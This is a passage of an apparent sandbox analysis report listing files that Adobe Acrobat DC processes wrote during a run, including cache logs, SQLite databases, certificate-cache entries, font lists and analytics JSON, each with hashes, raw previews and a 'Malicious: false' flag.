SHA-512:	8FD3579C3EE0757450673B1645CC0480174D2267A6D16FD337BCC4B0A4ABEC145B604D5F9E3C7D5F877115C4F4D1EF2FD818C084057BFD314887005E85FC92C6
Malicious:	false
Preview:	...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.255225144113688
Encrypted:	false
SSDEEP:	6:HTSR+q2PcNwi2nKuAl9OmbzNMxIFUt8YAD5Zmw+YcVkwOcNwi2nKuAl9OmbzNMFd:+cvLZHAa8jFUt8ZD5/+b54ZHAa84J
MD5:	D0EFE7250AE731FCE2AACA0A7B7853AF
SHA1:	79434DAAC9109F6CFBF4D88AE1F319F00504CBE6
SHA-256:	E6221B50B3078529B56D27ADC4304FA7B6F13529E929438461AC9496B36ABA35
SHA-512:	9C5BB9B399A08E5AFCC2F4DD24A08E234C099FE85683EA9BE6F1CD22227510378DC9EA507E63DD6A366516EA466FD3B5283B42C8026449F04AF4EC412906D437
Malicious:	false
Preview:	2024/11/22-09:50:25.325 7f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/22-09:50:25.367 7f8 Recovering log #3.2024/11/22-09:50:25.417 7f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.255225144113688
Encrypted:	false
SSDEEP:	6:HTSR+q2PcNwi2nKuAl9OmbzNMxIFUt8YAD5Zmw+YcVkwOcNwi2nKuAl9OmbzNMFd:+cvLZHAa8jFUt8ZD5/+b54ZHAa84J
MD5:	D0EFE7250AE731FCE2AACA0A7B7853AF
SHA1:	79434DAAC9109F6CFBF4D88AE1F319F00504CBE6
SHA-256:	E6221B50B3078529B56D27ADC4304FA7B6F13529E929438461AC9496B36ABA35
SHA-512:	9C5BB9B399A08E5AFCC2F4DD24A08E234C099FE85683EA9BE6F1CD22227510378DC9EA507E63DD6A366516EA466FD3B5283B42C8026449F04AF4EC412906D437
Malicious:	false
Preview:	2024/11/22-09:50:25.325 7f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/22-09:50:25.367 7f8 Recovering log #3.2024/11/22-09:50:25.417 7f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.438936960209286
Encrypted:	false
SSDEEP:	384:yeaci5GaiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:16urVgazUpUTTGt
MD5:	D77F6A1065EA73677A6C92B9508864F7
SHA1:	54729651F5F477412CAAF69157D80F48B59E85E0
SHA-256:	24626CD659112A4B65B6CF92DB6AE439DF65CFD24E116821FAAEC39E935F1D95
SHA-512:	A93F538341BBB4AF02F0B5E5B8AF38256339D0AEAFC830597D7C13AF8C5B72CDCEB3C72C1C6AE4FE101F81666B405B38BDB1F09122972D45DC510A656B0F28CD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.7751187455263566
Encrypted:	false
SSDEEP:	48:7Mvp/E2ioyVsioy3DoWoy1CABoy1AKOioy1noy1AYoy1Wioy1hioybioy+oy1noY:7Upjus0iAgXKQfkb9IVXEBodRBkO
MD5:	8072C2347C4D2800154EDD34A12FE940
SHA1:	290F0BAF60016AEC41A1401CA4B180441641F506
SHA-256:	1A9F7488EF5C465AB955B873AA4B6637B866BF54333CCCF3F6B1FB053BE7AD87
SHA-512:	EC412AEC5C80760C7D51FAC6284006206631AACC268663C8036F4E6963AD63A390EEAE4016294A3351DECB3BC40033863604A5557886A503ACA72AAA06E78073
Malicious:	false
Preview:	.... .c......F.4...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7569015731729736
Encrypted:	false
SSDEEP:	3:kkFkl6yr3lXfllXlE/HT8k8abNNX8RolJuRdxLlGB9lQRYwpDdt:kKjaVIT8QpNMa8RdWBwRd
MD5:	39632E8222F56DA00171D2363B5F6DE3
SHA1:	23B999A590405FDF03A95729E7892C67B2FF2408
SHA-256:	39D332957956A924FBA6A894D49617294806037276BA30DD33414B7F0D44F3D4
SHA-512:	92D8325236B8DC3C8F90A26595AAEA9E3C0061D17C499300723A8AEF1B7BDDE0EE38EE9C36050FF95632936B65E819A9DED5C36718049AC0525A928578B95BE7
Malicious:	false
Preview:	p...... ..........P..<..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.253995428229512
Encrypted:	false
SSDEEP:	6:kK999UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:FkDImsLNkPlE99SNxAhUe/3
MD5:	DB61F2D29EF5506A3D9BB1FD928A17D8
SHA1:	6E672A6DD7DE1C71FA5394FDE5BCC4AC39D2F215
SHA-256:	DD981AF4D04413C00EF4CC1854CC738EC30A617C2F92C90E1F1E01A7EF16A47F
SHA-512:	8F97C9E3258DAE29A529A2F56CBE847FB4FDEA28761D10283772E4FD356506A94E71D73D9BB7E6C4228D6F175B20DDD9F1970637F27DA4BC5D5917AF9A827691
Malicious:	false
Preview:	p...... ..........>..<..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7428

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7428

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.377917115324539
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJM3g98kUwPeUkwRe9:YvXKXfssdTeOWZGMbLUkee9
MD5:	7EA2128F48C9D1DB23D79E15B835AB2F
SHA1:	84B411FF471CD65E2B5895A1579F1CF5EC5F7747
SHA-256:	4D37F5A1CEA1DB1FC455C54404C7917E087A833650A762BCF71C8A0496571798
SHA-512:	D392F967C891EB8F3C612731EA808C958FE664E6FEAC4C3CE50ADEEEAC8F1A9CB1B4E0486A20E9B80E52857773D81D0B500318E185F6C380CA277FF793752C26
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.316833068325948
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJfBoTfXpnrPeUkwRe9:YvXKXfssdTeOWZGWTfXcUkee9
MD5:	883D114C78401C5F13363129C42EDD4E
SHA1:	D9E2C2C8454D6A1A20361DD938D4F55A3F3A7356
SHA-256:	88581A7440FEDD40C557BC6C0E3AB0F6604A061A91C2CCB2B00054250CA83ECC
SHA-512:	7CDEFEAC53463F9483063A7D7541168D7432E3E516CC3A4B4D40F42232D9B65DC56840D17C59D0CA765CE255CAB6C1B929D57C491E22CDFD1E988513D7B9F67E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.29631963746335
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJfBD2G6UpnrPeUkwRe9:YvXKXfssdTeOWZGR22cUkee9
MD5:	515CAAE63B19A54BD4721312CA9D835E
SHA1:	48EB623963C9B39BBFC456E6788792DF383A8B18
SHA-256:	9B708D7970F82A2DAF08CAEAD77F80229C16991A0A3D1E09E52E200461880F28
SHA-512:	C34CC778BA8F2647FC9985184B8137B4742F39C2AFBFDD51D603BA8D859325908765CD5BBFF9C624EE992DF6AB7298CC3F2EBBF557BDE7F14F1DAB1AE4146FF0
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.365306075637508
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1phQSWsGiIPEeOF0YzQZqoAvJfPmwrPeUkwRe9:YvXKXfssdTeOWZGH56Ukee9
MD5:	326DFD5E4AC9FFA694F6FD4F18D440FB
SHA1:	E0787786A7DA175822AED3AAA9988D8EBB170B41
SHA-256:	0FCB374038FD87E977D5BFBFD8E21EF37E09AA4F9448882642CEBC11C1103445
SHA-512:	A5DC228649FDDDC4CB051C37837585C20E6BFD24A01AD35E79FF2A22EEC56AF2FD2F58ED3F72695CFF9F92815A804B6E8B2266E2428A501EC4DC7DDFF5DF4AF1
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"16913424-b907-4dee-9062-4d1346710b97","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1732455392212,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.690572023685919
Encrypted:	false
SSDEEP:	24:Yv6XkmeOnpLgE9cQx8LennAvzBvkn0RCmK8czOCCSG:YvSeQhgy6SAFv5Ah8cv/G
MD5:	41C26C7AEEF732008CA1A6A662918B58
SHA1:	5B4DF3AE065FC20669FAF15810E0497B8141E4C1
SHA-256:	9945075775D179CCD51597CE08F524C24FFC807DEDA02F953DBD20A9180EAAF1
SHA-512:	06E6E0AF0632FCFC142400BF32DFFF26A9B241037D280455CF0799C0F784613AF89808AE442E68A5D8DF37895CCE9A3130F5B2A1BACB0A5DE256E187223A3462
Malicious:	false
